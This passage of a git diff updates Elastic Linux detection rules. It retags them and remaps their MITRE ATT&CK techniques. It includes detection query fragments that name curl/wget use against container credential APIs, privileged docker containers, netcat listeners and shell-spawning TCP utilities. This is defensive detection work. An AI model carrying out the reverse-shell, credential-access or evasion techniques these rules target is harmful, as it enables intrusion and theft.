severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Data Source: Auditd Manager", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Defend for Containers", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -127,19 +112,19 @@ process.name in ("curl", "wget") and process.args like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1552.007" +name = "Container API" +reference = "https://attack.mitre.org/techniques/T1552/007/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml b/rules/linux/execution_nc_listener_via_rlwrap.toml index 7e6e8f09bbf..0e630db8bb7 100644 --- a/rules/linux/execution_nc_listener_via_rlwrap.toml +++ b/rules/linux/execution_nc_listener_via_rlwrap.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,17 +91,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,16 +105,11 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml index b094488daa9..3ad4d30131f 100644 --- a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml +++ b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -43,15 +43,7 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -102,29 +94,24 @@ In Linux environments, the `mprotect()` system call adjusts memory permissions, framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1620" +name = "Reflective Code Loading" +reference = "https://attack.mitre.org/techniques/T1620/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_network_event_post_compilation.toml b/rules/linux/execution_network_event_post_compilation.toml index 42342789d2f..1ab588e751b 100644 --- a/rules/linux/execution_network_event_post_compilation.toml +++ b/rules/linux/execution_network_event_post_compilation.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,14 +44,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id with maxspan=1m @@ -113,29 +106,29 @@ In Linux environments, compiling and executing programs is routine for developme framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.004" +name = "Compile After Delivery" +reference = "https://attack.mitre.org/techniques/T1027/004/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_perl_tty_shell.toml b/rules/linux/execution_perl_tty_shell.toml index fdf0986337e..24093ae8322 100644 --- a/rules/linux/execution_perl_tty_shell.toml +++ b/rules/linux/execution_perl_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -130,6 +130,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml index c3d550b7b8b..d875a90451b 100644 --- a/rules/linux/execution_potential_hack_tool_executed.toml +++ b/rules/linux/execution_potential_hack_tool_executed.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,18 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Tactic: Initial Access", "Tactic: Reconnaissance", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -128,8 +117,86 @@ process.name in~ ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.002" +name = "Password Cracking" +reference = "https://attack.mitre.org/techniques/T1110/002/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.002" +name = "Vulnerability Scanning" +reference = "https://attack.mitre.org/techniques/T1595/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/linux/execution_potentially_overly_permissive_container_creation.toml b/rules/linux/execution_potentially_overly_permissive_container_creation.toml index 69ded33a6ec..2fcd60481d8 100644 --- a/rules/linux/execution_potentially_overly_permissive_container_creation.toml +++ b/rules/linux/execution_potentially_overly_permissive_container_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,17 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -107,16 +97,6 @@ process.name:docker and process.args:(run and --privileged) [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" @@ -139,7 +119,6 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml index b89fc96dc27..535e1497a84 100644 --- a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml +++ b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -94,18 +94,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -120,28 +109,37 @@ not process.parent.name:(sshd or make or su or ds_agent or fortitraylauncher or framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml index 9188badd565..121dd0f3510 100644 --- a/rules/linux/execution_process_started_from_process_id_file.toml +++ b/rules/linux/execution_process_started_from_process_id_file.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,18 +65,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Threat: BPFDoor", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -88,14 +77,18 @@ process where host.os.type == "linux" and event.type == "start" and user.id == " [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.008" +name = "Masquerade File Type" +reference = "https://attack.mitre.org/techniques/T1036/008/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml index 1f0801f42f1..856d4737fb0 100644 --- a/rules/linux/execution_process_started_in_shared_memory_directory.toml +++ b/rules/linux/execution_process_started_in_shared_memory_directory.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,16 +56,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Threat: BPFDoor", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -120,9 +111,22 @@ Shared memory directories in Linux, such as /dev/shm and /run/shm, are designed framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/linux/execution_python_tty_shell.toml b/rules/linux/execution_python_tty_shell.toml index c8eff177979..739358a6ff2 100644 --- a/rules/linux/execution_python_tty_shell.toml +++ b/rules/linux/execution_python_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/15" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -117,6 +117,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" diff --git a/rules/linux/execution_python_webserver_spawned.toml b/rules/linux/execution_python_webserver_spawned.toml index 5f6a9442737..6306061e099 100644 --- a/rules/linux/execution_python_webserver_spawned.toml +++ b/rules/linux/execution_python_webserver_spawned.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -126,16 +126,3 @@ reference = "https://attack.mitre.org/techniques/T1059/006/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml index a1fd996d20e..60af7276a56 100644 --- a/rules/linux/execution_shell_evasion_linux_binary.toml +++ b/rules/linux/execution_shell_evasion_linux_binary.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -126,15 +126,7 @@ Session View uses process data collected by the Elastic Defend integration, but For more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -194,19 +186,31 @@ process where host.os.type == "linux" and event.type == "start" and process.exec [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/linux/execution_shell_openssl_client_or_server.toml b/rules/linux/execution_shell_openssl_client_or_server.toml index b57a9c5ebbe..59e7bcf2dd8 100644 --- a/rules/linux/execution_shell_openssl_client_or_server.toml +++ b/rules/linux/execution_shell_openssl_client_or_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,16 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -114,27 +105,14 @@ not process.parent.executable in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1573" +name = "Encrypted Channel" +reference = "https://attack.mitre.org/techniques/T1573/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1573.002" +name = "Asymmetric Cryptography" +reference = "https://attack.mitre.org/techniques/T1573/002/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml index 71f6934441f..4565044ed1e 100644 --- a/rules/linux/execution_shell_via_background_process.toml +++ b/rules/linux/execution_shell_via_background_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/20" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,17 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -106,6 +96,19 @@ process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -120,16 +123,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml index b1d6944dd41..70bad06fdd8 100644 --- a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml +++ b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,14 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=5s @@ -108,6 +101,19 @@ sequence by host.id, process.entity_id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = 